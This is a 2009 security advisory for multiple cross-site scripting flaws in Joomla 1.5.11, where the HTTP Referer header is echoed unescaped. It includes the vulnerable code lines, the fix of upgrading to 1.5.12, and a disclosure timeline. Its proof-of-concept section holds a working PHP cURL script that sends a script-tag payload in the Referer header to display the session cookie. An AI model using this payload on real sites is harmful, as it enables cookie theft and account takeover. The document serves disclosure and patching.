Joomla Multiple Cross Site Scripting Issues

2009-07-02T00:00:00
ID PACKETSTORM:78874
Type packetstorm
Reporter Juan Galiana Lara
Modified 2009-07-02T00:00:00

Description

                                        
                                            `=============================================  
INTERNET SECURITY AUDITORS ALERT 2009-007  
- Original release date: June 30th, 2009  
- Last revised: July 2nd, 2009  
- Discovered by: Juan Galiana Lara  
- Severity: 6.8/10 (CVSS Base Score)  
=============================================  
  
I. VULNERABILITY  
-------------------------  
Joomla! < 1.5.12 Multiple XSS vulnerabilities in HTTP Headers  
  
II. BACKGROUND  
-------------------------  
Joomla! is an award-winning content management system (CMS), which  
enables you to build Web sites and powerful online applications. Many  
aspects, including its ease-of-use and extensibility, have made  
Joomla! the most popular Web site software available. Best of all,  
Joomla! is an open source solution that is freely available to everyone.  
  
III. DESCRIPTION  
-------------------------  
Joomla! fails to sanitized user supplied input. An attacker can inject  
JavaScript or DHTML code that will be executed in the context of  
targeted user browser, allowing him to steal cookies. HTTP headers are  
not properly parsed, concretly the HTTP_REFERER variable.  
  
Snippet of vulnerable code:  
  
Line 225 of file components/com_content/views/article/tmpl/form.php is  
vunerable.  
  
221 <input type="hidden" name="option" value="com_content" />  
222 <input type="hidden" name="id" value="<?php echo  
$this->article->id; ?>" />  
223 <input type="hidden" name="version" value="<?php echo  
$this->article->version; ?>" />  
224 <input type="hidden" name="created_by" value="<?php echo  
$this->article->created_by; ?>" />  
225 <input type="hidden" name="referer" value="<?php echo  
@$_SERVER['HTTP_REFERER']; ?>" />  
226 <?php echo JHTML::_( 'form.token' ); ?>  
227 <input type="hidden" name="task" value="" />  
228 </form>  
  
Other parts of code may be affected:  
  
components/com_user/controller.php:86: $return =  
@$_SERVER['HTTP_REFERER'];  
plugins/system/legacy/html.php:246: echo '<a href="'.  
$_SERVER['HTTP_REFERER'] .'"><span class="small">'. JText::_( 'BACK' )  
.'</span></a>';  
templates/beez/html/com_content/article/form.php:186: <input  
type="hidden" name="referer" value="<?php echo  
@$_SERVER['HTTP_REFERER']; ?>" />  
  
IV. PROOF OF CONCEPT  
-------------------------  
An attacker can redirect the victim to a site with this script for  
executing javascript code in the victim's browser. The PoC creates a  
crafted HTTP request with malicious data in the HTTP_REFERER header.  
In order to succesfully exploit it, an account with any role is  
needed. For example, an user with any role can escalate privileges to  
administrator.  
<?php  
  
/* PoC: XSS Joomla 1.5.11  
Juan Galiana Lara  
Internet Security Auditors  
Jun 2009  
*/  
  
/* config */  
$site='localhost';  
$path='/joomla-1.5.11';  
$cookname='d85558a8cf943386aaa374896bfd3d99';  
$cookvalue='4ab56fdd83bcad86289726aead602699';  
  
class cURL {  
var $headers;  
var $user_agent;  
var $compression;  
var $cookie_file;  
var $proxy;  
/* evil script */  
var $xss='alert("PWN PWN PWN: " + document.cookie);';  
  
  
function  
cURL($cookies=TRUE,$cookie='cookies.txt',$compression='gzip',$proxy='') {  
$this->headers[] = 'Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8';  
$this->headers[] = 'Connection: Keep-Alive';  
$this->headers[] = 'Content-type:  
application/x-www-form-urlencoded;charset=UTF-8';  
$this->headers[] = 'Referer: "><script>' . $this->xss  
.'</script><span a="';  
$this->user_agent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT  
5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)';  
$this->compression=$compression;  
$this->proxy=$proxy;  
$this->cookies=$cookies;  
if ($this->cookies == TRUE) $this->cookie($cookie);  
}  
  
function cookie($cookie_file) {  
if (file_exists($cookie_file)) {  
$this->cookie_file=$cookie_file;  
} else {  
fopen($cookie_file,'w') or $this->error('The cookie file could  
not be opened. Check permissions');  
$this->cookie_file=$cookie_file;  
fclose($this->cookie_file);  
}  
}  
  
function get($url) {  
$process = curl_init($url);  
curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers);  
curl_setopt($process, CURLOPT_HEADER, 0);  
curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent);  
if ($this->cookies == TRUE) curl_setopt($process,  
CURLOPT_COOKIEFILE, $this->cookie_file);  
if ($this->cookies == TRUE) curl_setopt($process,  
CURLOPT_COOKIEJAR, $this->cookie_file);  
curl_setopt($process,CURLOPT_ENCODING , $this->compression);  
curl_setopt($process, CURLOPT_TIMEOUT, 30);  
if ($this->proxy) curl_setopt($cUrl, CURLOPT_PROXY,  
'proxy_ip:proxy_port');  
curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);  
curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1);  
$return = curl_exec($process);  
curl_close($process);  
return $return;  
}  
  
function error($error) {  
echo $error;  
die;  
}  
}  
  
/* set cookie */  
$f=fopen("cookies.txt","w");  
fwrite($f,"localhost\tFALSE\t/\tFALSE\t0\t$cookname\t$cookvalue\n");  
fclose($f);  
  
/* do request */  
$cc = new cURL();  
$c=$cc->get('http://' . $site . $path .  
'/index.php?option=com_content&view=article&layout=form');  
  
/* let's execute some javascript.. }:-)*/  
echo $c;  
?>  
  
V. BUSINESS IMPACT  
-------------------------  
An attacker can exploit the vulnerability to inyect DHTML and  
JavaScript code in the context of the web browser. This may lead in  
steal the targeted user cookies and gain access to the user account  
icluding administrator privileges.  
  
VI. SYSTEMS AFFECTED  
-------------------------  
Joomla! versions prior and including 1.5.11 are vulnerable.  
  
VII. SOLUTION  
-------------------------  
Upgrade to version 1.5.12  
  
VIII. REFERENCES  
-------------------------  
http://www.joomla.org  
http://www.isecauditors.com  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered  
by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).  
  
X. REVISION HISTORY  
-------------------------  
June 30, 2009: Initial release.  
July 02, 2009: Last revision.  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
June 30, 2009: Discovered by Internet Security Auditors.  
June 30, 2009: Vendor contacted. Fast response.  
July 01, 2009: Joomla! publish update. Great job.  
July 02, 2009: Advisory published.  
  
XII. LEGAL NOTICES  
-------------------------  
The information contained within this advisory is supplied "as-is"  
with no warranties or guarantees of fitness of use or otherwise.  
Internet Security Auditors accepts no responsibility for any damage  
caused by the use or misuse of this information.  
`